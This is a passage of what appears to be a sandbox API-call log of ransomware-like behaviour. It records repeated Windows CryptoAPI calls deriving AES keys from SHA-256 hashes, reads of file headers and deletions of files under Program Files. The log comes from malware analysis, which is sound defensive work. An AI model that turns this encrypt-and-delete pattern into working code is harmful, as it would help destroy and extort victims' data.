nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0184.817] CryptDestroyHash (hHash=0x284d668) returned 1 [0184.817] CryptDestroyKey (hKey=0x284d5a8) returned 1 [0184.817] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0184.818] DeleteFileW (lpFileName="C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\RedistList\\FrameworkList.xml" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\redistlist\\frameworklist.xml")) returned 0 [0184.819] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.819] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.819] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.820] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.832] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.853] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.856] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.856] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.857] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.880] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.881] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.888] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0184.901] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0184.902] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0184.902] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.902] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0184.902] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4d82 [0184.902] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0184.936] CryptDestroyHash (hHash=0x284d528) returned 1 [0184.936] CryptDestroyKey (hKey=0x284d568) returned 1 [0184.936] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0184.937] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\avtransport.xml")) returned 0 [0185.036] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.037] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.037] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.037] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.037] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14ff [0185.037] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.051] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.051] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.051] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.053] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\connectionmanager_dmr.xml")) returned 0 [0185.053] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.054] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.054] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.054] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.054] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba3 [0185.054] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.057] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.057] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.057] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.059] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.jpg")) returned 0 [0185.074] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.074] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.074] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.074] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.075] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a1c [0185.075] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.092] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.092] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.092] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.094] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_120.png")) returned 0 [0185.094] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.095] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.095] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.095] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.095] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4c4 [0185.095] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.099] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.099] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.099] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.100] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.jpg")) returned 0 [0185.102] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.102] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.102] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.103] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.103] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10a9 [0185.103] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.107] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.107] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.107] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.108] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.png")) returned 0 [0185.109] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.110] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.110] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.110] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.110] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18db [0185.110] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.140] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.140] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.140] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.142] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml")) returned 0 [0185.144] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0185.150] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.151] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.151] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.151] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.151] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x152e [0185.151] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.154] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.155] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.155] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.156] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ConnectionManager.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\connectionmanager.xml")) returned 0 [0185.157] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.158] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.158] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.158] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.158] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2092 [0185.158] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.162] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.162] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.162] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.164] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\ContentDirectory.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\contentdirectory.xml")) returned 0 [0185.164] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.165] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.165] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.165] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.165] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa0e [0185.165] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.190] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.190] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.190] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.192] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\MediaReceiverRegistrar.xml" (normalized: "c:\\program files\\windows media player\\network sharing\\mediareceiverregistrar.xml")) returned 0 [0185.192] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.193] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.193] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.193] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.193] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5352 [0185.193] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.243] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.243] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.243] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.245] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.jpg")) returned 0 [0185.246] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.247] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.247] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.247] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.247] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1922 [0185.247] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.251] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.251] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.251] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.252] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw120.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw120.png")) returned 0 [0185.254] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.254] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.254] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.254] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.254] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc38 [0185.255] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.259] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.259] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.259] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.261] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.bmp")) returned 0 [0185.261] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.262] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.262] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.262] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.262] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x231f [0185.262] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.265] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.265] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.266] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.267] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw32.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw32.jpg")) returned 0 [0185.289] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.290] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.290] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.290] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.290] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x980 [0185.290] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.293] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.293] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.293] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.295] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.bmp" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.bmp")) returned 0 [0185.295] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.296] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.296] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.296] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.296] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2aa0 [0185.296] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.327] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.327] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.327] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.329] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.jpg")) returned 0 [0185.330] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.331] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.331] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.331] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.331] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x101c [0185.331] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.334] CryptDestroyHash (hHash=0x284d528) returned 1 [0185.334] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.334] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.336] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_bw48.png" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_bw48.png")) returned 0 [0185.337] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.337] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.338] CryptHashData (hHash=0x284d628, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.338] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0185.338] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5788 [0185.338] ReadFile (in: hFile=0x4c8, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0185.359] CryptDestroyHash (hHash=0x284d628) returned 1 [0185.359] CryptDestroyKey (hKey=0x284d568) returned 1 [0185.359] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0185.361] DeleteFileW (lpFileName="C:\\Program Files\\Windows Media Player\\Network Sharing\\wmpnss_color120.jpg" (normalized: "c:\\program files\\windows media player\\network sharing\\wmpnss_color120.jpg")) returned 0 [0185.361] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52810) returned 1 [0185.362] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0185.362] CryptHashData (hHash=0x284d528, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 